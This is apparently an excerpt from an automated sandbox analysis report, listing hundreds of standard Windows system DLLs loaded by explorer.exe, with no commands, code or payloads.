                Source: C:\Windows\explorer.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: starttiledata.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: usermgrcli.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: usermgrproxy.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: cscui.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: structuredquery.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.globalization.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: bcp47mrm.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: icu.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: mswb7.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.search.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: explorerframe.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: actxprxy.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ninput.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: starttiledata.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: idstore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wlidprov.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: usermgrcli.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.applicationmodel.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: usermgrproxy.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: appxdeploymentclient.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: sndvolsso.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: mmdevapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: devobj.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: oleacc.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryclient.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: appextension.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.ui.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windowmanagementapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: inputhost.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dcomp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: d3d11.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: resourcepolicyclient.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: d3d10warp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dxcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: d2d1.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: xmllite.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: cldapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: fltlib.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dataexchange.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: explorerframe.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: tiledatarepository.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: staterepository.core.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.staterepository.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: twinui.pcshell.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wincorlib.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: cdp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dsreg.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.immersiveshell.serviceprovider.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.staterepositorycore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: mrmcorer.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: languageoverlayutil.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: bcp47mrm.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: thumbcache.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: actxprxy.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: photometadatahandler.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: twinui.appcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: twinui.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: pdh.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ntshrui.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: applicationframe.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: cscapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: linkinfo.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: rmclient.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dui70.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ehstorshell.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: provsvc.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: duser.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: cscui.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.ui.fileexplorer.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: uiribbon.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: atlthunk.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: holographicextensions.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: virtualmonitormanager.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: resourcepolicyclient.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.ui.immersive.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: abovelockapphost.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: npsm.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.web.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.shell.bluelightreduction.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.internal.signals.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: tdh.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: mscms.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: coloradapterclient.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.staterepositorybroker.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: networkexplorer.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: structuredquery.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: mfplat.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: rtworkq.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: taskflowdatauser.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.security.authentication.web.core.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.data.activities.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.internal.ui.shell.windowtabmanager.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: notificationcontrollerps.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.devices.enumeration.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.globalization.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: icu.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: mswb7.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: devdispitemprovider.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.networking.connectivity.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.ui.core.textinput.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: uianimation.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windowsudk.shellcommon.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dictationmanager.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: npmproxy.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: pcshellcommonproxystub.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: cryptngc.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: cflapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: execmodelproxy.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: daxexec.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: container.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: shellcommoncommonproxystub.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: aepic.dll
                Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
                Source: C:\Windows\explorer.exeSection loaded: userenv.dll
                Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: dxgi.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: propsys.dll
                Source: C:\Windows\explorer.exeSection loaded: coremessaging.dll
                Source: C:\Windows\explorer.exeSection loaded: urlmon.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dll
                Source: C:\Windows\explorer.exeSection loaded: wininet.dll
                Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
                Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
                Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
                Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
                Source: C:\Windows\explorer.exeSection loaded: wldp.dll
                Source: C:\Windows\explorer.exeSection loaded: iertutil.dll
                Source: C:\Windows\explorer.exeSection loaded: srvcli.dll
                Source: C:\Windows\explorer.exeSection loaded: netutils.dll
                Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
                Source: C:\Windows\explorer.exeSection loaded: ninput.dll
                Source: C:\Windows\explorer.exeSection loaded: appresolver.dll
                Source: C:\Windows\explorer.exeSection loaded: bcp47langs.dll
                Source: C:\Windows\explorer.exeSection loaded: slc.dll
                Source: C:\Windows\explorer.exeSection loaded: sppc.dll
                Source: C:\Windows\explorer.exeSection loaded: profapi.dll
                Source: C:\Windows\explorer.exeSection loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\explorer.exeSection loaded: starttiledata.dll
                Source: C:\Windows\explorer.exeSection loaded: idstore.dll
                Source: C:\Windows\explorer.exeSection loaded: wlidprov.dll
                Source: C:\Windows\explorer.exeSection loaded: samcli.dll
                Source: C:\Windows\explorer.exeSection loaded: usermgrcli.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryps.dll
                Source: C:\Windows\explorer.exeSection loaded: policymanager.dll
                Source: C:\Windows\explorer.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\explorer.exeSection loaded: winsta.dll
                Source: C:\Windows\explorer.exeSection loaded: sndvolsso.dll
                Source: C:\Windows\explorer.exeSection loaded: mmdevapi.dll
                Source: C:\Windows\explorer.exeSection loaded: devobj.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.applicationmodel.dll
                Source: C:\Windows\explorer.exeSection loaded: oleacc.dll
                Source: C:\Windows\explorer.exeSection loaded: appxdeploymentclient.dll
                Source: C:\Windows\explorer.exeSection loaded: usermgrproxy.dll
                Source: C:\Windows\explorer.exeSection loaded: textshaping.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.ui.dll
                Source: C:\Windows\explorer.exeSection loaded: windowmanagementapi.dll
                Source: C:\Windows\explorer.exeSection loaded: textinputframework.dll
                Source: C:\Windows\explorer.exeSection loaded: inputhost.dll
                Source: C:\Windows\explorer.exeSection loaded: wintypes.dll
                Source: C:\Windows\explorer.exeSection loaded: coreuicomponents.dll
                Source: C:\Windows\explorer.exeSection loaded: wintypes.dll
                Source: C:\Windows\explorer.exeSection loaded: coreuicomponents.dll
                Source: C:\Windows\explorer.exeSection loaded: windowscodecs.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryclient.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.dll
                Source: C:\Windows\explorer.exeSection loaded: dcomp.dll
                Source: C:\Windows\explorer.exeSection loaded: d3d11.dll
                Source: C:\Windows\explorer.exeSection loaded: resourcepolicyclient.dll
                Source: C:\Windows\explorer.exeSection loaded: d3d10warp.dll
                Source: C:\Windows\explorer.exeSection loaded: dxcore.dll
                Source: C:\Windows\explorer.exeSection loaded: d2d1.dll
                Source: C:\Windows\explorer.exeSection loaded: dwrite.dll
                Source: C:\Windows\explorer.exeSection loaded: xmllite.dll
                Source: C:\Windows\explorer.exeSection loaded: appextension.dll
                Source: C:\Windows\explorer.exeSection loaded: cldapi.dll
                Source: C:\Windows\explorer.exeSection loaded: fltlib.dll
                Source: C:\Windows\explorer.exeSection loaded: dataexchange.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dll
                Source: C:\Windows\explorer.exeSection loaded: explorerframe.dll
                Source: C:\Windows\explorer.exeSection loaded: apphelp.dll
                Source: C:\Windows\explorer.exeSection loaded: tiledatarepository.dll
                Source: C:\Windows\explorer.exeSection loaded: staterepository.core.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.staterepository.dll
                Source: C:\Windows\explorer.exeSection loaded: twinui.pcshell.dll
                Source: C:\Windows\explorer.exeSection loaded: wkscli.dll
                Source: C:\Windows\explorer.exeSection loaded: wincorlib.dll
                Source: C:\Windows\explorer.exeSection loaded: cdp.dll
                Source: C:\Windows\explorer.exeSection loaded: dsreg.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.immersiveshell.serviceprovider.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.staterepositorycore.dll
                Source: C:\Windows\explorer.exeSection loaded: mrmcorer.dll
                Source: C:\Windows\explorer.exeSection loaded: languageoverlayutil.dll
                Source: C:\Windows\explorer.exeSection loaded: bcp47mrm.dll
                Source: C:\Windows\explorer.exeSection loaded: thumbcache.dll
                Source: C:\Windows\explorer.exeSection loaded: edputil.dll
                Source: C:\Windows\explorer.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Windows\explorer.exeSection loaded: cryptngc.dll
                Source: C:\Windows\explorer.exeSection loaded: ncrypt.dll
                Source: C:\Windows\explorer.exeSection loaded: ntasn1.dll
                Source: C:\Windows\explorer.exeSection loaded: cflapi.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.networking.connectivity.dll
                Source: C:\Windows\explorer.exeSection loaded: twinui.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: twinui.dll
                Source: C:\Windows\explorer.exeSection loaded: pdh.dll
                Source: C:\Windows\explorer.exeSection loaded: npmproxy.dll
                Source: C:\Windows\explorer.exeSection loaded: applicationframe.dll
                Source: C:\Windows\explorer.exeSection loaded: photometadatahandler.dll
                Source: C:\Windows\explorer.exeSection loaded: rmclient.dll
                Source: C:\Windows\explorer.exeSection loaded: ntshrui.dll
                Source: C:\Windows\explorer.exeSection loaded: cscapi.dll
                Source: C:\Windows\explorer.exeSection loaded: linkinfo.dll
                Source: C:\Windows\explorer.exeSection loaded: holographicextensions.dll
                Source: C:\Windows\explorer.exeSection loaded: virtualmonitormanager.dll
                Source: C:\Windows\explorer.exeSection loaded: resourcepolicyclient.dll
                Source: C:\Windows\explorer.exeSection loaded: ehstorshell.dll
                Source: C:\Windows\explorer.exeSection loaded: cscui.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.ui.immersive.dll
                Source: C:\Windows\explorer.exeSection loaded: abovelockapphost.dll
                Source: C:\Windows\explorer.exeSection loaded: provsvc.dll
                Source: C:\Windows\explorer.exeSection loaded: npsm.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.shell.bluelightreduction.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.web.dll
                Source: C:\Windows\explorer.exeSection loaded: mscms.dll
                Source: C:\Windows\explorer.exeSection loaded: coloradapterclient.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.internal.signals.dll
                Source: C:\Windows\explorer.exeSection loaded: tdh.dll
                Source: C:\Windows\explorer.exeSection loaded: cryptbase.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.staterepositorybroker.dll
                Source: C:\Windows\explorer.exeSection loaded: mfplat.dll
                Source: C:\Windows\explorer.exeSection loaded: rtworkq.dll
                Source: C:\Windows\explorer.exeSection loaded: taskflowdatauser.dll
                Source: C:\Windows\explorer.exeSection loaded: actxprxy.dll
                Source: C:\Windows\explorer.exeSection loaded: structuredquery.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.system.launcher.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.security.authentication.web.core.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.data.activities.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.shell.servicehostbuilder.dll
                Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dll
                Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dll
                Source: C:\Windows\explorer.exeSection loaded: msvcp140.dll
                Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.internal.ui.shell.windowtabmanager.dll
                Source: C:\Windows\explorer.exeSection loaded: notificationcontrollerps.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.devices.enumeration.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.globalization.dll
                Source: C:\Windows\explorer.exeSection loaded: icu.dll
                Source: C:\Windows\explorer.exeSection loaded: mswb7.dll
                Source: C:\Windows\explorer.exeSection loaded: devdispitemprovider.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.ui.core.textinput.dll
                Source: C:\Windows\explorer.exeSection loaded: uianimation.dll
                Source: C:\Windows\explorer.exeSection loaded: windowsudk.shellcommon.dll
                Source: C:\Windows\explorer.exeSection loaded: dictationmanager.dll
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
                Source: C:\Windows\explorer.exeSection loaded: mswsock.dll
                Source: C:\Windows\explorer.exeSection loaded: winnsi.dll
                Source: C:\Windows\explorer.exeSection loaded: dpapi.dll
                Source: C:\Windows\explorer.exeSection loaded: msasn1.dll
                Source: C:\Windows\explorer.exeSection loaded: rsaenh.dll
                Source: C:\Windows\explorer.exeSection loaded: gpapi.dll
                Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
                Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\explorer.exeSection loaded: schannel.dll
                Source: C:\Windows\explorer.exeSection loaded: stobject.dll
                Source: C:\Windows\explorer.exeSection loaded: wmiclnt.dll
                Source: C:\Windows\explorer.exeSection loaded: workfoldersshell.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.fileexplorer.common.dll
                Source: C:\Windows\explorer.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\explorer.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\explorer.exeSection loaded: pcshellcommonproxystub.dll
                Source: C:\Windows\explorer.exeSection loaded: execmodelproxy.dll
                Source: C:\Windows\explorer.exeSection loaded: daxexec.dll
                Source: C:\Windows\explorer.exeSection loaded: container.dll
                Source: C:\Windows\explorer.exeSection loaded: shellcommoncommonproxystub.dll
                Source: C:\Windows\explorer.exeSection loaded: batmeter.dll
                Source: C:\Windows\explorer.exeSection loaded: sxs.dll
                Source: C:\Windows\explorer.exeSection loaded: inputswitch.dll
                Source: C:\Windows\explorer.exeSection loaded: es.dll
                Source: C:\Windows\explorer.exeSection loaded: prnfldr.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.ui.shell.dll
                Source: C:\Windows\explorer.exeSection loaded: dxp.dll
                Source: C:\Windows\explorer.exeSection loaded: shdocvw.dll
                Source: C:\Windows\explorer.exeSection loaded: syncreg.dll
                Source: C:\Windows\explorer.exeSection loaded: actioncenter.dll
                Source: C:\Windows\explorer.exeSection loaded: wevtapi.dll
                Source: C:\Windows\explorer.exeSection loaded: dusmapi.dll
                Source: C:\Windows\explorer.exeSection loaded: wscinterop.dll
                Source: C:\Windows\explorer.exeSection loaded: atlthunk.dll
                Source: C:\Windows\explorer.exeSection loaded: wscapi.dll
                Source: C:\Windows\explorer.exeSection loaded: aepic.dll
                Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
                Source: C:\Windows\explorer.exeSection loaded: userenv.dll
                Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: dxgi.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: propsys.dll
                Source: C:\Windows\explorer.exeSection loaded: coremessaging.dll
                Source: C:\Windows\explorer.exeSection loaded: urlmon.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dll
                Source: C:\Windows\explorer.exeSection loaded: wininet.dll
                Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
                Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
                Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
                Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
                Source: C:\Windows\explorer.exeSection loaded: wldp.dll
                Source: C:\Windows\explorer.exeSection loaded: iertutil.dll
                Source: C:\Windows\explorer.exeSection loaded: srvcli.dll
                Source: C:\Windows\explorer.exeSection loaded: netutils.dll
                Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
                Source: C:\Windows\explorer.exeSection loaded: ninput.dll
                Source: C:\Windows\explorer.exeSection loaded: appresolver.dll
                Source: C:\Windows\explorer.exeSection loaded: bcp47langs.dll
                Source: C:\Windows\explorer.exeSection loaded: slc.dll
                Source: C:\Windows\explorer.exeSection loaded: sppc.dll
                Source: C:\Windows\explorer.exeSection loaded: profapi.dll
